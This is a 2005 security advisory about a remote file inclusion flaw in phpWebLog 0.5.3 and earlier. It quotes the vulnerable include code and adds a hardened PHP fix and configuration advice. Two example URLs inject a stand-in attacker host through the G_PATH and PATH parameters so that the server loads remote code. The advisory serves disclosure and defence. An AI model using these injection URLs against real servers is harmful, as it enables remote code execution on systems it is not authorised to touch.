Securityvulns: SECURITYVULNS:DOC:8009
Mar 09, 2005 - 12:00 a.m.

phpWebLog <= 0.5.3 arbitrary file inclusion (VXSfx)


– == – == – == – == – == – == – == – == – == –
Name: phpWebLog
Version: <= 0.5.3
Homepage: http://phpweblog.org/

Author: Filip Groszynski (VXSfx)
Date: 7 March 2005
– == – == – == – == – == – == – == – == – == –

Vulnerable code in include/init.inc.php:

    # Allowed HTML tags in stories, comma separated
    $G_HTML = "<a>,<i>,<b>,<u>,<li>,<p>,<code>,<tt>,<blockquote>";

    # Are we developing?
    $G_DEBUG = false;

    # Number of seconds to hold cache
    $G_CACHE = 10;

    # phpWebLog version
    $G_VER = "0.5.3";

    /*== include libraries/functions =========================================*/

    include_once("$G_PATH/include/func.inc.php");
    include_once("$G_PATH/include/cache.inc.php");
    include_once("$G_PATH/include/blocks.inc.php");
    include_once("$G_PATH/include/layout.inc.php");
    include_once("$G_PATH/include/parser.inc.php");
    include_once("$G_PATH/include/search.inc.php");
    include_once("$G_PATH/include/comments.inc.php");


Vulnerable code in backend/addons/links/index.php:

    # Original links code written by Twyst (http://anime-central.net)
    # Modified for use with phpWebLog by Jason Hines
    # Thanks Twyst!

    include_once($PATH . "/functions.php");


Example:

if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/
http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/
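
An added example, not part of the advisory and not phpWebLog's own code: one way to harden the include block of include/init.inc.php so the base path no longer comes from a variable that register_globals can populate from the query string. It assumes PHP 7 or later and that the file sits in the include/ directory of the install root; pwl_resolve_include is a hypothetical helper name.

```php
<?php
// Added example (not phpWebLog code): hardened replacement for the include
// block in include/init.inc.php.
// Assumption: this file lives in <install root>/include/.

// Derive the install root from this file's own location. Assigning it here
// overwrites any G_PATH value injected through register_globals.
$G_PATH = dirname(__DIR__);

/**
 * Hypothetical helper: resolve $relative under $base and refuse anything
 * that is not an existing local file inside $base.
 */
function pwl_resolve_include(string $base, string $relative): string
{
    $baseReal = realpath($base);
    // realpath() only resolves local filesystem paths, so a URL such as
    // http://... or ftp://... yields false and is rejected below.
    $target = realpath($base . '/' . $relative);

    if ($baseReal === false || $target === false || !is_file($target)) {
        throw new RuntimeException("include not found: $relative");
    }

    // The resolved path must stay below the base directory, which also
    // rejects "../" sequences and symlinks pointing elsewhere.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("include escapes base path: $relative");
    }

    return $target;
}

// Fixed allowlist of library names, matching the includes quoted above.
$libraries = ['func', 'cache', 'blocks', 'layout', 'parser', 'search', 'comments'];

foreach ($libraries as $name) {
    include_once pwl_resolve_include($G_PATH, "include/$name.inc.php");
}
```

The same approach applies to `$PATH` in backend/addons/links/index.php. Setting register_globals=off and allow_url_fopen=off in php.ini removes the two preconditions the advisory names.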


Vendor status:

Vendor has been notified.


Contact:

Author:    Filip Groszynski   (VXSfx)
Location:  Poland <Warsaw>
Email:     groszynskif <at> gmail <dot> com
HP:        http://shell.homeunix.org

– == – == – == – == – == – == – == – == – == –